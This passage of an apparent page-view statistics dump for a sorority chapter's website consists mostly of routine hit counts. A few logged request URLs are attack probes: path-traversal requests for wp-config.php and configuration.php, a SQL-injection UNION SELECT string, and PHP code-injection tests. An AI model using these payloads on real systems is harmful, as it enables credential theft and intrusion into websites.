017-06-04',1,865),('/ts_teams/jontue-sumler/','2017-06-04',1,862),('/ts_teams/celia-worrell/','2017-06-04',1,860),('/ts_teams/jeaneathia-yerby-crowder/','2017-06-04',1,828),('/cause/march-of-dimes/','2017-06-04',1,1023),('/cause/scholarship/','2017-06-04',1,59),('/login/','2017-06-04',1,549),('/download/aarc/','2017-06-04',1,991),('/download/constitution-by-laws/','2017-06-04',1,989),('/appa','2017-06-04',1,781),('/appa/','2017-06-04',1,781),('/','2017-06-05',36,6),('/event/breakfast-on-the-go','2017-06-05',1,493),('/programs','2017-06-05',1,247),('/event/breakfast-on-the-go/','2017-06-05',3,493),('/programs/','2017-06-05',3,247),('/cause/marchofdimes-2','2017-06-05',1,90),('/cause/marchofdimes-2/','2017-06-05',1,90),('/ts_teams/tamara-curtis/','2017-06-05',4,821),('/login','2017-06-05',1,549),('/scholarship','2017-06-05',1,797),('/login/','2017-06-05',1,549),('/scholarship/','2017-06-05',1,797),('/members','2017-06-05',1,553),('/members/','2017-06-05',1,553),('/bog','2017-06-05',1,772),('/bog/','2017-06-05',1,772),('/','2017-06-06',52,6),('/members/','2017-06-06',5,553),('/history/','2017-06-06',4,190),('/appa/','2017-06-06',1,781),('/youth/','2017-06-06',1,738),('/programs/','2017-06-06',2,247),('/scholarship/','2017-06-06',2,797),('/login','2017-06-06',1,549),('/event/march-dimes-march-babies/','2017-06-06',1,1007),('/lgz-celebrates-35-years-service-howard-county-md/','2017-06-06',1,956),('/event/marchofdimes/','2017-06-06',1,1034),('/cause/marchofdimes-2/','2017-06-06',1,90),('/event/winetasting/','2017-06-06',1,1038),('/event/breakfast-on-the-go/','2017-06-06',1,493),('/login/','2017-06-06',1,549),('/','2017-06-07',56,6),('/history/','2017-06-07',1,190),('/cause/marchofdimes-2/','2017-06-07',3,90),('/zen/','2017-06-07',2,786),('/programs/','2017-06-07',5,247),('/appa','2017-06-07',1,781),('/appa/','2017-06-07',1,781),('/youth','2017-06-07',1,738),('/youth/','2017-06-07',1,738),('/bog','2017-06-07',1,772),('/bog/','2017-06-07',1,772),('/zen','2017-06-07',1,786),('/','2017-06-08',84,6),('/lgz-celebrates-35-years-service-howard-county-md/','2017-06-08',2,956),('/history/','2017-06-08',4,190),('/members/','2017-06-08',2,553),('/programs/','2017-06-08',2,247),('/scholarship/','2017-06-08',4,797),('/cause/marchofdimes-2/','2017-06-08',2,90),('/event/marchofdimes/','2017-06-08',2,1034),('/event/breakfast-on-the-go/','2017-06-08',2,493),('/event/march-dimes-march-babies/','2017-06-08',2,1007),('/membership/','2017-06-08',5,576),('/ts_teams/cassandra-dorsey/','2017-06-08',1,880),('/ts_teams/cherice-daniel-2/','2017-06-08',1,825),('/ts_teams/shanee-satchell/','2017-06-08',1,820),('/membership/?//connect.facebook.net/en_US/sdk.js','2017-06-08',1,576),('/membership','2017-06-08',2,576),('/ts_teams/helen-newman/','2017-06-08',1,868),('/ts_teams/sandra-hudson/','2017-06-08',1,875),('/ts_teams/patreece-carter/?//connect.facebook.net/en_US/sdk.js','2017-06-08',1,885),('/ts_teams/jeaneathia-yerby-crowder/','2017-06-08',1,828),('/ts_teams/kristin-clark/','2017-06-08',1,883),('/ts_teams/rose-matthews/','2017-06-08',1,870),('/ts_teams/lillet-williams-2/','2017-06-08',1,824),('/ts_teams/constance-kinder/','2017-06-08',1,822),('/ts_teams/tamika-r-daniels/','2017-06-08',1,814),('/ts_teams/kathy-ball/','2017-06-08',1,887),('/appa/','2017-06-08',3,781),('/ts_teams/jontue-sumler/','2017-06-08',1,862),('/ts_teams/michele-franklin/','2017-06-08',1,877),('/ts_teams/rosee-ragin/','2017-06-08',1,866),('/ts_teams/angela-jefferson/','2017-06-08',1,874),('/ts_teams/w-ruth-conway/','2017-06-08',1,881),('/ts_teams/linda-brigmon/?//connect.facebook.net/en_US/sdk.js','2017-06-08',1,886),('/ts_teams/ebony-cogdell/','2017-06-08',1,882),('/bog/','2017-06-08',3,772),('/ts_teams/linda-brigmon/','2017-06-08',1,886),('/ts_teams/w-ruth-conway/?//connect.facebook.net/en_US/sdk.js','2017-06-08',1,881),('/ts_teams/kathy-j-barrett/','2017-06-08',1,819),('/ts_teams/tamara-curtis/','2017-06-08',1,821),('/ts_teams/ava-lawson/','2017-06-08',1,872),('/ts_teams/celia-worrell/','2017-06-08',1,860),('/ts_teams/christy-lewis/','2017-06-08',1,818),('/ts_teams/crystal-whitaker/','2017-06-08',1,816),('/members/?//connect.facebook.net/en_US/sdk.js','2017-06-08',1,553),('/login','2017-06-08',4,549),('/login/','2017-06-08',4,549),('/ts_teams/linda-price/','2017-06-08',1,867),('/history','2017-06-08',2,190),('/ts_teams/kristin-clark/?//connect.facebook.net/en_US/sdk.js','2017-06-08',1,883),('/ts_teams/tracy-irvin/','2017-06-08',1,815),('/event/winetasting/','2017-06-08',1,1038),('/ts_teams/kalima-alawode/','2017-06-08',1,888),('/ts_teams/crystal-whitaker/?//connect.facebook.net/en_US/sdk.js','2017-06-08',1,816),('/ts_teams/patreece-carter/','2017-06-08',1,885),('/ts_teams/dawn-j-kemp/','2017-06-08',1,817),('/scholarship','2017-06-08',2,797),('/ts_teams/quiyatta-gardner/','2017-06-08',1,876),('/membership/?//connect_facebook_net/en_US/sdk_js','2017-06-08',1,576),('/ts_teams/gloria-sanders/','2017-06-08',1,865),('/ts_teams/maya-franklin/','2017-06-08',1,878),('/ts_slider/567/','2017-06-08',1,567),('/appa','2017-06-08',2,781),('/cause/march-of-dimes/','2017-06-08',1,1023),('/cause/scholarship/','2017-06-08',1,59),('/ts_teams/nathalia-drew/','2017-06-08',1,1084),('/download/aarc/','2017-06-08',1,991),('/bog','2017-06-08',2,772),('/zen','2017-06-08',2,786),('/zen/','2017-06-08',2,786),('/youth','2017-06-08',2,738),('/youth/','2017-06-08',2,738),('/ts_teams/lillet-williams/','2017-06-08',1,823),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2017-06-08',1,689),('/','2017-06-09',36,6),('/login','2017-06-09',2,549),('/programs/','2017-06-09',3,247),('/scholarship/','2017-06-09',3,797),('/history/','2017-06-09',2,190),('/lgz-celebrates-35-years-service-howard-county-md/','2017-06-09',1,956),('/cause/marchofdimes-2/','2017-06-09',3,90),('/members/','2017-06-09',2,553),('/login/','2017-06-09',2,549),('/membership/','2017-06-09',2,576),('/ts_teams/cassandra-dorsey/','2017-06-09',1,880),('/zen/','2017-06-09',2,786),('/?=Send&contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-06-09',1,6),('/?contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-06-09',1,6),('/download/constitution-by-laws/','2017-06-09',1,989),('/download/aarc/','2017-06-09',1,991),('/cause/march-of-dimes/','2017-06-09',1,1023),('/cause/scholarship/','2017-06-09',2,59),('/','2017-06-10',41,6),('/ts_teams/kalima-alawode/','2017-06-10',1,888),('/ts_teams/rose-matthews/','2017-06-10',1,870),('/','2017-06-11',40,6),('/ts_teams/christy-lewis/','2017-06-11',1,818),('/ts_teams/rosee-ragin/','2017-06-11',1,866),('/cause/marchofdimes-2/','2017-06-11',17,90),('/login','2017-06-11',2,549),('/lgz-celebrates-35-years-service-howard-county-md/','2017-06-11',2,956),('/history/','2017-06-11',2,190),('/programs/','2017-06-11',2,247),('/scholarship/','2017-06-11',2,797),('/login/','2017-06-11',2,549),('/members/','2017-06-11',2,553),('/','2017-06-12',66,6),('/cause/marchofdimes-2/','2017-06-12',22,90),('/members/','2017-06-12',1,553),('/scholarship/','2017-06-12',1,797),('/lgz-celebrates-35-years-service-howard-county-md/','2017-06-12',1,956),('/scholarship/','2017-06-13',3,797),('/','2017-06-13',80,6),('/history/','2017-06-13',2,190),('/login','2017-06-13',2,549),('/lgz-celebrates-35-years-service-howard-county-md/','2017-06-13',2,956),('/programs/','2017-06-13',2,247),('/cause/marchofdimes-2/','2017-06-13',18,90),('/members/','2017-06-13',2,553),('/login/','2017-06-13',2,549),('/ts_teams/ebony-cogdell/','2017-06-13',1,882),('/ts_teams/crystal-whitaker/','2017-06-13',1,816),('/ts_teams/kalima-alawode/','2017-06-13',1,888),('/ts_teams/quiyatta-gardner/','2017-06-13',1,876),('/ts_teams/tracy-irvin/','2017-06-13',2,815),('/ts_teams/kathy-ball/','2017-06-13',2,887),('/ts_teams/tamika-r-daniels/','2017-06-13',2,814),('/ts_teams/dawn-j-kemp/','2017-06-13',1,817),('/ts_teams/linda-brigmon/','2017-06-13',1,886),('/ts_teams/cassandra-dorsey/','2017-06-13',1,880),('/ts_teams/kristin-clark/','2017-06-13',1,883),('/ts_teams/shanee-satchell/','2017-06-13',1,820),('/ts_teams/sandra-hudson/','2017-06-13',1,875),('/ts_teams/patreece-carter/','2017-06-13',2,885),('/ts_teams/michele-franklin/','2017-06-13',2,877),('/youth','2017-06-13',1,738),('/bog','2017-06-13',1,772),('/appa','2017-06-13',1,781),('/ts_teams/rose-matthews/','2017-06-13',1,870),('/ts_teams/celia-worrell/','2017-06-13',1,860),('/ts_teams/linda-price/','2017-06-13',1,867),('/zen','2017-06-13',1,786),('/ts_teams/ava-lawson/','2017-06-13',1,872),('/ts_teams/helen-newman/','2017-06-13',1,868),('/ts_teams/jontue-sumler/','2017-06-13',1,862),('/youth/','2017-06-13',1,738),('/zen/','2017-06-13',1,786),('/bog/','2017-06-13',1,772),('/appa/','2017-06-13',1,781),('/ts_teams/maya-franklin/','2017-06-13',1,878),('/ts_teams/kathy-j-barrett/','2017-06-13',1,819),('/ts_teams/lillet-williams-2/','2017-06-13',1,824),('/ts_teams/nathalia-drew/','2017-06-13',1,1084),('/ts_teams/tamara-curtis/','2017-06-13',1,821),('/ts_teams/christy-lewis/','2017-06-13',1,818),('/ts_teams/rosee-ragin/','2017-06-13',1,866),('/ts_teams/angela-jefferson/','2017-06-13',1,874),('/ts_teams/jeaneathia-yerby-crowder/','2017-06-13',1,828),('/ts_teams/w-ruth-conway/','2017-06-13',1,881),('/ts_teams/constance-kinder/','2017-06-13',1,822),('/ts_teams/gloria-sanders/','2017-06-13',1,865),('/ts_teams/cherice-daniel-2/','2017-06-13',1,825),('/ts_teams/lillet-williams/','2017-06-13',1,823),('/','2017-06-14',32,6),('/cause/marchofdimes-2/','2017-06-14',32,90),('/members/','2017-06-14',3,553),('/programs/','2017-06-14',1,247),('/','2017-06-15',36,6),('/cause/marchofdimes-2/','2017-06-15',15,90),('/index.php?jat3action=gzip&type=css&file=configuration.php','2017-06-15',1,6),('/index.php?option=com_jetext&task=download&file=%5B../../index.php%5D','2017-06-15',1,6),('/index.php?option=com_cckjseblod&task=download&file=configuration.php','2017-06-15',1,6),('/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/md5(3.1415),222--%20-','2017-06-15',1,6),('/index.php?option=com_ebcontent&view=article&tmpl=component&id=MD5(3.1415)&cid=9&print=','2017-06-15',1,6),('/lgz-celebrates-35-years-service-howard-county-md/','2017-06-15',4,956),('/zen/','2017-06-15',1,786),('/','2017-06-16',33,6),('/cause/marchofdimes-2/','2017-06-16',24,90),('/login','2017-06-16',2,549),('/history/','2017-06-16',2,190),('/programs/','2017-06-16',4,247),('/scholarship/','2017-06-16',3,797),('/lgz-celebrates-35-years-service-howard-county-md/','2017-06-16',2,956),('/members/','2017-06-16',5,553),('/login/','2017-06-16',2,549),('/','2017-06-17',27,6),('/cause/marchofdimes-2/','2017-06-17',16,90),('/history/','2017-06-17',2,190),('/members/','2017-06-17',5,553),('/scholarship/','2017-06-17',2,797),('/programs/','2017-06-17',1,247),('/appa/','2017-06-17',1,781),('/','2017-06-18',20,6),('/programs/','2017-06-18',4,247),('/members/','2017-06-18',5,553),('/cause/marchofdimes-2/','2017-06-18',33,90),('/scholarship/','2017-06-18',1,797),('/login','2017-06-18',1,549),('/lgz-celebrates-35-years-service-howard-county-md/','2017-06-18',1,956),('/history/','2017-06-18',1,190),('/','2017-06-19',31,6),('/cause/marchofdimes-2/','2017-06-19',14,90),('/programs/','2017-06-19',3,247),('/youth','2017-06-19',1,738),('/youth/','2017-06-19',1,738),('/login','2017-06-19',1,549),('/login/','2017-06-19',1,549),('/members/','2017-06-19',3,553),('/ts_teams/tamara-curtis/','2017-06-19',1,821),('/scholarship/','2017-06-19',1,797),('/','2017-06-20',33,6),('/programs/','2017-06-20',2,247),('/cause/marchofdimes-2/','2017-06-20',27,90),('/members/','2017-06-20',5,553),('/history/','2017-06-20',3,190),('/lgz-celebrates-35-years-service-howard-county-md/','2017-06-20',1,956),('/zen/','2017-06-20',1,786),('/','2017-06-21',28,6),('/cause/marchofdimes-2/','2017-06-21',23,90),('/login','2017-06-21',1,549),('/sorors/','2017-06-21',2,1093),('/history/','2017-06-21',1,190),('/members/','2017-06-21',1,553),('/cause/marchofdimes-2/','2017-06-22',21,90),('/','2017-06-22',24,6),('/lgz-celebrates-35-years-service-howard-county-md/','2017-06-22',1,956),('/members/','2017-06-22',1,553),('/','2017-06-23',21,6),('/cause/marchofdimes-2/','2017-06-23',29,90),('/scholarship/','2017-06-23',2,797),('/cause/scholarship/','2017-06-23',1,59),('/members/','2017-06-23',1,553),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2017-06-23',1,689),('/','2017-06-24',29,6),('/cause/marchofdimes-2/','2017-06-24',17,90),('/index.php','2017-06-24',2,6),('/','2017-06-25',17,6),('/cause/marchofdimes-2/','2017-06-25',24,90),('/download/constitution-by-laws/','2017-06-25',1,989),('/history/','2017-06-25',2,190),('/programs/','2017-06-25',3,247),('/appa','2017-06-25',1,781),('/appa/','2017-06-25',1,781),('/youth','2017-06-25',1,738),('/youth/','2017-06-25',1,738),('/','2017-06-26',47,6),('/lgz-celebrates-35-years-service-howard-county-md/','2017-06-26',5,956),('/login','2017-06-26',2,549),('/history/','2017-06-26',3,190),('/members/','2017-06-26',3,553),('/scholarship/','2017-06-26',3,797),('/programs/','2017-06-26',6,247),('/cause/marchofdimes-2/','2017-06-26',24,90),('/sorors/','2017-06-26',1,1093),('/zen/','2017-06-26',2,786),('/ts_teams/tracy-irvin/','2017-06-26',1,815),('/youth','2017-06-26',2,738),('/youth/','2017-06-26',2,738),('/cause/marchofdimes-2/','2017-06-27',28,90),('/','2017-06-27',46,6),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2Fadmin.php%3Fpage%3Dmiwoftp%26option%3Dcom_miwoftp%26action%3Ddownload%26item%3D..%2Fwp-config.php%26order%3Dname%26srt%3Dyes&reauth=1','2017-06-27',1,657),('/scholarship/','2017-06-27',5,797),('/history/','2017-06-27',6,190),('/members/','2017-06-27',2,553),('/programs/','2017-06-27',6,247),('/login','2017-06-27',2,549),('/sorors/','2017-06-27',6,1093),('/lgz-celebrates-35-years-service-howard-county-md/','2017-06-27',11,956),('/zen/','2017-06-27',1,786),('/scholarship/embed/','2017-06-27',2,797),('/download/aarc/','2017-06-27',2,991),('/download/constitution-by-laws/','2017-06-27',2,989),('/cause/march-of-dimes/','2017-06-27',2,1023),('/cause/scholarship/','2017-06-27',2,59),('/?p=956','2017-06-27',2,956),('/lgz-celebrates-35-years-service-howard-county-md/feed/','2017-06-27',2,956),('/embed/','2017-06-27',2,6),('/cause/marchofdimes-2/','2017-06-28',26,90),('/','2017-06-28',24,6),('/index.php?15=print(md5(32423));exit();','2017-06-28',1,6),('/?15=print%28md5%2832423%29%29%3Bexit%28%29%3B','2017-06-28',2,6),('/?15=print(md5(32423));exit();','2017-06-28',1,6),('/shop','2017-06-28',1,535),('/programs','2017-06-28',1,247),('/scholarship','2017-06-28',1,797),('/programs/','2017-06-28',2,247),('/scholarship/','2017-06-28',1,797),('/members','2017-06-28',1,553),('/members/','2017-06-28',1,553),('/cause/marchofdimes-2','2017-06-28',1,90),('/login','2017-06-28',1,549),('/sorors/','2017-06-28',1,1093),('/history/','2017-06-28',1,190),('/cause/marchofdimes-2/','2017-06-29',33,90),('/','2017-06-29',69,6),('/members/','2017-06-29',1,553),('/ts_teams/tracy-irvin/','2017-06-29',1,815),('/programs/','2017-06-29',1,247),('/membership/','2017-06-29',3,576),('/','2017-06-30',57,6),('/cause/marchofdimes-2/','2017-06-30',21,90),('/membership/','2017-06-30',3,576),('/scholarship/','2017-06-30',1,797),('/','2017-07-01',41,6),('/history/','2017-07-01',2,190),('/members/','2017-07-01',2,553),('/programs/','2017-07-01',2,247),('/scholarship/','2017-07-01',2,797),('/ts_teams/cherice-daniel-2/','2017-07-01',2,825),('/ts_teams/lillet-williams-2/','2017-07-01',2,824),('/ts_teams/lillet-williams/','2017-07-01',2,823),('/ts_teams/constance-kinder/','2017-07-01',2,822),('/ts_teams/tamara-curtis/','2017-07-01',2,821),('/ts_teams/shanee-satchell/','2017-07-01',2,820),('/ts_teams/kathy-j-barrett/','2017-07-01',2,819),('/ts_teams/christy-lewis/','2017-07-01',2,818),('/ts_teams/dawn-j-kemp/','2017-07-01',2,817),('/ts_teams/crystal-whitaker/','2017-07-01',2,816),('/ts_teams/tracy-irvin/','2017-07-01',2,815),('/ts_teams/tamika-r-daniels/','2017-07-01',2,814),('/ts_teams/nathalia-drew/','2017-07-01',2,1084),('/ts_teams/kalima-alawode/','2017-07-01',2,888),('/ts_teams/kathy-ball/','2017-07-01',2,887),('/ts_teams/linda-brigmon/','2017-07-01',2,886),('/ts_teams/patreece-carter/','2017-07-01',2,885),('/ts_teams/kristin-clark/','2017-07-01',2,883),('/ts_teams/ebony-cogdell/','2017-07-01',2,882),('/ts_teams/w-ruth-conway/','2017-07-01',2,881),('/ts_teams/cassandra-dorsey/','2017-07-01',2,880),('/ts_teams/maya-franklin/','2017-07-01',2,878),('/ts_teams/michele-franklin/','2017-07-01',2,877),('/ts_teams/quiyatta-gardner/','2017-07-01',2,876),('/ts_teams/sandra-hudson/','2017-07-01',2,875),('/ts_teams/angela-jefferson/','2017-07-01',2,874),('/ts_teams/ava-lawson/','2017-07-01',2,872),('/ts_teams/rose-matthews/','2017-07-01',2,870),('/ts_teams/helen-newman/','2017-07-01',2,868),('/ts_teams/linda-price/','2017-07-01',2,867),('/ts_teams/rosee-ragin/','2017-07-01',2,866),('/ts_teams/gloria-sanders/','2017-07-01',2,865),('/ts_teams/jontue-sumler/','2017-07-01',2,862),('/ts_teams/celia-worrell/','2017-07-01',2,860),('/ts_teams/jeaneathia-yerby-crowder/','2017-07-01',2,828),('/cause/marchofdimes-2/','2017-07-01',33,90),('/lgz-celebrates-35-years-service-howard-county-md/','2017-07-01',2,956),('/','2017-07-02',42,6),('/cause/marchofdimes-2/','2017-07-02',27,90),('/scholarship/','2017-07-02',3,797),('/programs/','2017-07-02',5,247),('/history/','2017-07-02',4,190),('/members/','2017-07-02',3,553),('/login','2017-07-02',2,549),('/sorors/','2017-07-02',2,1093),('/lgz-celebrates-35-years-service-howard-county-md/','2017-07-02',1,956),('/ts_teams/cherice-daniel-2/','2017-07-02',1,825),('/ts_teams/lillet-williams-2/','2017-07-02',1,824),('/ts_teams/lillet-williams/','2017-07-02',1,823),('/ts_teams/constance-kinder/','2017-07-02',1,822),('/ts_teams/tamara-curtis/','2017-07-02',1,821),('/ts_teams/shanee-satchell/','2017-07-02',1,820),('/ts_teams/kathy-j-barrett/','2017-07-02',1,819),('/ts_teams/christy-lewis/','2017-07-02',1,818),('/ts_teams/dawn-j-kemp/','2017-07-02',1,817),('/ts_teams/crystal-whitaker/','2017-07-02',1,816),('/ts_teams/tamika-r-daniels/','2017-07-02',1,814),('/ts_teams/tracy-irvin/','2017-07-02',1,815),('/ts_teams/nathalia-drew/','2017-07-02',1,1084),('/ts_teams/kalima-alawode/','2017-07-02',1,888),('/ts_teams/kathy-ball/','2017-07-02',1,887),('/ts_teams/linda-brigmon/','2017-07-02',1,886),('/ts_teams/patreece-carter/','2017-07-02',1,885),('/ts_teams/kristin-clark/','2017-07-02',1,883),('/ts_teams/ebony-cogdell/','2017-07-02',1,882),('/ts_teams/w-ruth-conway/','2017-07-02',1,881),('/ts_teams/cassandra-dorsey/','2017-07-02',1,880),('/ts_teams/maya-franklin/','2017-07-02',1,878),('/ts_teams/michele-franklin/','2017-07-02',1,877),('/ts_teams/quiyatta-gardner/','2017-07-02',1,876),('/ts_teams/sandra-hudson/','2017-07-02',1,875),('/ts_teams/angela-jefferson/','2017-07-02',1,874),('/ts_teams/ava-lawson/','2017-07-02',1,872),('/ts_teams/rose-matthews/','2017-07-02',1,870),('/ts_teams/helen-newman/','2017-07-02',1,868),('/ts_teams/linda-price/','2017-07-02',1,867),('/ts_teams/rosee-ragin/','2017-07-02',1,866),('/ts_teams/gloria-sanders/','2017-07-02',1,865),('/ts_teams/jontue-sumler/','2017-07-02',1,862),('/ts_teams/celia-worrell/','2017-07-02',1,860),('/ts_teams/jeaneathia-yerby-crowder/','2017-07-02',1,828),('/cause/march-of-dimes/','2017-07-02',1,1023),('/cause/scholarship/','2017-07-02',1,59),('/download/aarc/','2017-07-02',1,991),('/download/constitution-by-laws/','2017-07-02',1,989),('/cause/marchofdimes-2/','2017-07-03',22,90),('/','2017-07-03',42,6),('/scholarship/','2017-07-03',2,797),('/members/','2017-07-03',1,553),('/','2017-07-04',36,6),('/login','2017-07-04',2,549),('/history/','2017-07-04',2,190),('/programs/','2017-07-04',3,247),('/lgz-celebrates-35-years-service-howard-county-md/','2017-07-04',2,956),('/cause/marchofdimes-2/','2017-07-04',19,90),('/scholarship/','2017-07-04',3,797),('/members/','2017-07-04',3,553),('/sorors/','2017-07-04',2,1093),('/login/','2017-07-04',3,549),('/cause/marchofdimes-2/','2017-07-05',36,90),('/','2017-07-05',50,6),('/programs/','2017-07-05',4,247),('/members/','2017-07-05',5,553),('/login','2017-07-05',2,549),('/sorors/','2017-07-05',3,1093),('/scholarship/','2017-07-05',2,797),('/history/','2017-07-05',2,190),('/lgz-celebrates-35-years-service-howard-county-md/','2017-07-05',2,956),('/appa','2017-07-05',1,781),('/ts_teams/kathy-j-barrett/','2017-07-05',2,819),('/ts_teams/shanee-satchell/','2017-07-05',2,820),('/ts_teams/celia-worrell/','2017-07-05',2,860),('/cause/scholarship/','2017-07-05',2,59),('/ts_teams/christy-lewis/','2017-07-05',2,818),('/ts_teams/linda-price/','2017-07-05',2,867),('/ts_teams/lillet-williams/','2017-07-05',2,823),('/ts_teams/sandra-hudson/','2017-07-05',2,875),('/ts_teams/jeaneathia-yerby-crowder/','2017-07-05',2,828),('/ts_teams/kathy-ball/','2017-07-05',3,887),('/ts_teams/michele-franklin/','2017-07-05',2,877),('/ts_teams/dawn-j-kemp/','2017-07-05',2,817),('/ts_teams/w-ruth-conway/','2017-07-05',2,881),('/ts_teams/quiyatta-gardner/','2017-07-05',2,876),('/?p=956','2017-07-05',1,956),('/members/feed/','2017-07-05',1,553),('/ts_teams/cherice-daniel-2/','2017-07-05',2,825),('/ts_teams/jontue-sumler/','2017-07-05',2,862),('/ts_teams/maya-franklin/','2017-07-05',2,878),('/ts_teams/nathalia-drew/','2017-07-05',2,1084),('/ts_teams/gloria-sanders/','2017-07-05',2,865),('/ts_teams/crystal-whitaker/','2017-07-05',2,816),('/lgz-celebrates-35-years-service-howard-county-md/feed/','2017-07-05',1,956),('/ts_teams/cassandra-dorsey/','2017-07-05',2,880),('/ts_teams/linda-brigmon/','2017-07-05',2,886),('/cause/march-of-dimes/','2017-07-05',2,1023),('/ts_teams/angela-jefferson/','2017-07-05',2,874),('/ts_teams/lillet-williams-2/','2017-07-05',2,824),('/ts_teams/kristin-clark/','2017-07-05',2,883),('/ts_teams/kalima-alawode/','2017-07-05',2,888),('/ts_teams/tamika-r-daniels/','2017-07-05',2,814),('/ts_teams/ebony-cogdell/','2017-07-05',2,882),('/bog','2017-07-05',1,772),('/youth','2017-07-05',1,738),('/ts_teams/helen-newman/','2017-07-05',2,868),('/scholarship','2017-07-05',1,797),('/ts_teams/ava-lawson/','2017-07-05',2,872),('/zen','2017-07-05',1,786),('/ts_teams/constance-kinder/','2017-07-05',2,822),('/ts_teams/rose-matthews/','2017-07-05',2,870),('/ts_teams/rosee-ragin/','2017-07-05',2,866),('/ts_teams/tracy-irvin/','2017-07-05',2,815),('/ts_teams/patreece-carter/','2017-07-05',2,885),('/ts_teams/tamara-curtis/','2017-07-05',2,821),('/?=Send&contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-07-05',1,6),('/?contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-07-05',1,6),('/','2017-07-06',42,6),('/cause/marchofdimes-2/','2017-07-06',22,90),('/login','2017-07-06',1,549),('/history/','2017-07-06',1,190),('/scholarship/','2017-07-06',1,797),('/lgz-celebrates-35-years-service-howard-county-md/','2017-07-06',1,956),('/programs/','2017-07-06',1,247),('/members/','2017-07-06',1,553),('/sorors/','2017-07-06',1,1093),('/?contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-07-06',1,6),('/','2017-07-07',38,6),('/cause/marchofdimes-2/','2017-07-07',21,90),('/members/','2017-07-07',3,553),('/history/','2017-07-07',3,190),('/','2017-07-08',26,6),('/lgz-celebrates-35-years-service-howard-county-md/','2017-07-08',3,956),('/history/','2017-07-08',4,190),('/members/','2017-07-08',3,553),('/programs/','2017-07-08',4,247),('/scholarship/','2017-07-08',2,797),('/cause/marchofdimes-2/','2017-07-08',28,90),('/login','2017-07-08',2,549),('/sorors/','2017-07-08',2,1093),('/cause/marchofdimes-2/','2017-07-09',23,90),('/','2017-07-09',28,6),('/history/','2017-07-09',4,190),('/members/','2017-07-09',6,553),('/programs/','2017-07-09',3,247),('/scholarship/','2017-07-09',7,797),('/lgz-celebrates-35-years-service-howard-county-md/','2017-07-09',3,956),('/scholarship','2017-07-09',1,797),('/zen/','2017-07-09',1,786),('/download/constitution-by-laws/','2017-07-09',2,989),('/login','2017-07-09',1,549),('/sorors/','2017-07-09',2,1093),('/lgz-celebrates-35-years-service-howard-county-md/feed/','2017-07-09',1,956),('/download/aarc/','2017-07-09',1,991),('/appa','2017-07-09',1,781),('/appa/','2017-07-09',1,781),('/login/','2017-07-09',1,549),('/zen','2017-07-09',1,786),('/youth','2017-07-09',1,738),('/youth/','2017-07-09',2,738),('/bog','2017-07-09',1,772),('/bog/','2017-07-09',2,772),('/lgz-celebrates-35-years-service-howard-county-md/?=Send&contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-07-09',1,956),('/?p=956','2017-07-09',1,956),('/download/aarc/?=Send&contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-07-09',1,991),('/cause/marchofdimes-2/','2017-07-10',21,90),('/','2017-07-10',40,6),('/lgz-celebrates-35-years-service-howard-county-md/','2017-07-10',2,956),('/programs/','2017-07-10',1,247),('/download/aarc/?=Send&contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-07-10',1,991),('/zen/','2017-07-10',2,786),('/scholarship/','2017-07-10',1,797),('/?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB@intermal.com&f=../../../../wp-config.php','2017-07-10',1,6),('/?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB%40intermal.com&f=..%2F..%2F..%2F..%2Fwp-config.php','2017-07-10',1,6),('/','2017-07-11',53,6),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2Fadmin.php%3Fpage%3Dmiwoftp%26option%3Dcom_miwoftp%26action%3Ddownload%26item%3Dwp-config.php%26order%3Dname%26srt%3Dyes&reauth=1','2017-07-11',1,657),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2Fadmin.php%3Fpage%3Dmiwoftp%26option%3Dcom_miwoftp%26action%3Ddownload%26item%3D..%2Fwp-config.php%26order%3Dname%26srt%3Dyes&reauth=1','2017-07-11',1,657),('/cause/marchofdimes-2/','2017-07-11',28,90),('/ts_teams/rose-matthews/','2017-07-11',1,870),('/login','2017-07-11',1,549),('/lgz-celebrates-35-years-service-howard-county-md/','2017-07-11',1,956),('/history/','2017-07-11',1,190),('/scholarship/','2017-07-11',1,797),('/programs/','2017-07-11',1,247),('/members/','2017-07-11',1,553),('/sorors/','2017-07-11',1,1093),('/cause/marchofdimes-2/','2017-07-12',20,90),('/','2017-07-12',41,6),('/members/','2017-07-12',2,553),('/scholarship/','2017-07-12',2,797),('/programs/','2017-07-12',2,247),('/history/','2017-07-12',1,190),('/appa','2017-07-12',1,781),('/appa/','2017-07-12',1,781),('/lgz-celebrates-35-years-service-howard-county-md/','2017-07-12',3,956),('/download/aarc/?=Send&contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-07-12',1,991),('/zen/','2017-07-12',2,786),('/cause/marchofdimes-2/','2017-07-13',30,90),('/','2017-07-13',36,6),('/members/','2017-07-13',2,553),('/cause/marchofdimes-2/','2017-07-14',15,90),('/','2017-07-14',28,6),('/history/','2017-07-14',1,190),('/scholarship/','2017-07-14',1,797),('/programs/','2017-07-14',5,247),('/members/','2017-07-14',1,553),('/login','2017-07-14',1,549),('/lgz-celebrates-35-years-service-howard-county-md/','2017-07-14',1,956),('/sorors/','2017-07-14',1,1093),('/appa','2017-07-14',8,781),('/appa/','2017-07-14',2,781),('/youth','2017-07-14',5,738),('/youth/','2017-07-14',2,738),('/','2017-07-15',34,6),('/cause/marchofdimes-2/','2017-07-15',21,90),('/ts_teams/gloria-sanders','2017-07-15',1,865),('/ts_teams/gloria-sanders/','2017-07-15',1,865),('/ts_teams/tamika-r-daniels/','2017-07-15',1,814),('/ts_teams/tamara-curtis/','2017-07-15',1,821),('/cause/marchofdimes-2/','2017-07-16',31,90),('/','2017-07-16',31,6),('/programs/','2017-07-16',3,247),('/members/','2017-07-16',2,553),('/h